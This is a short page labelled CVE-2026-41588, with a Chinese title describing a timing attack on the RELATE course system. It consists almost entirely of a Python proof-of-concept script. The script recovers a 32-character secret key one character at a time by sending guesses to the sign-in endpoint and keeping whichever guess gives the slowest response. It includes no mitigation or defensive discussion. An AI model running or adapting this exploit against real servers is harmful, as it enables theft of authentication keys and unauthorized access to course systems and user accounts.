CVE-2026-41588 RELATE时序攻击漏洞

import requests import time import string # Target URL and parameters TARGET_URL = "http://target-relate-server/course/auth/sign_in" CHARSET = string.ascii_letters + string.digits KEY_LENGTH = 32 # Assumed key length # Timing attack PoC logic def extract_key(): discovered_key = "" for i in range(KEY_LENGTH): timings = {} for char in CHARSET: # Construct payload with current guess payload = {"key": discovered_key + char} # Measure response time start_time = time.time() try: requests.post(TARGET_URL, data=payload, timeout=5) except: pass elapsed = time.time() - start_time timings[char] = elapsed # Determine the character that caused the longest delay (likely correct) best_char = max(timings, key=timings.get) discovered_key += best_char print(f"Discovered byte {i+1}/{KEY_LENGTH}: {best_char}") return discovered_key if __name__ == "__main__": print("Starting timing attack...") recovered_key = extract_key() print(f"Recovered key: {recovered_key}")